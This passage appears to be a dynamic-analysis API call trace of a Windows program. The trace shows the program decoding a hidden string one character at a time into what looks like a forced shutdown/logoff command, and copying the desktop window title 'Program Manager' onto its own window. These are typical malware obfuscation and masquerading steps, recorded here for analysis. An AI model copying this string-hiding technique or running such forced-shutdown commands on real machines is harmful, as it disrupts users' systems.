lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0181.146] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.198] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.198] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.199] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0181.199] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.200] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0181.200] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.200] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.201] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.201] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0181.202] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.202] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0181.203] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.203] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0181.203] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.204] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0181.204] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.205] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.205] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.206] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.206] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.206] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0181.207] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.207] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.207] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.208] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.208] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.209] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0181.209] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.210] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.210] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.211] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.213] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.214] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.214] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.215] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.215] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.216] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.216] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.217] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.217] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.217] GetForegroundWindow () returned 0x20086 [0181.217] GetLastError () returned 0x0 [0181.218] SysStringLen (param_1=" ") returned 0xff [0181.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0181.218] SysStringLen (param_1=" ") returned 0xff [0181.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0181.218] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0181.218] GetLastError () returned 0x0 [0181.218] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0181.219] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0181.219] SysStringLen (param_1="Program Manager") returned 0x10 [0181.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Program Manager", cchWideChar=17, lpMultiByteStr=0x11470fc, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Program Manager", lpUsedDefaultChar=0x0) returned 17 [0181.219] SetWindowTextA (hWnd=0x103c4, lpString="Program Manager") returned 1 [0181.219] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0181.220] GetFocus () returned 0x0 [0181.220] lstrlenA (lpString="Program Manager") returned 15 [0181.220] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11470fc) returned 0x1 [0181.220] IsWindow (hWnd=0x103c4) returned 1 [0181.220] IsWindow (hWnd=0x103c4) returned 1 [0181.221] IsWindow (hWnd=0x103c4) returned 1 [0181.221] IsWindow (hWnd=0x103c4) returned 1 [0181.221] GetFocus () returned 0x0 [0181.221] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0181.222] GetFocus () returned 0x0 [0181.222] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x10) returned 0x10e1d20 [0181.222] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x10, lParam=0x10e1d20) returned 0xf [0181.222] GetFocus () returned 0x0 [0181.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0181.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x11470fc, cchWideChar=16 | out: lpWideCharStr="Program Manager") returned 16 [0181.222] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e1d20 | out: hHeap=0x10d0000) returned 1 [0181.222] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0181.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.224] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0181.224] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.224] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0181.225] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.226] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0181.226] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.227] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0181.227] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.227] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0181.228] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.229] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.229] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.230] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0181.230] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.230] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0181.231] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.231] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.232] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.232] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0181.232] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.233] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0181.233] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, 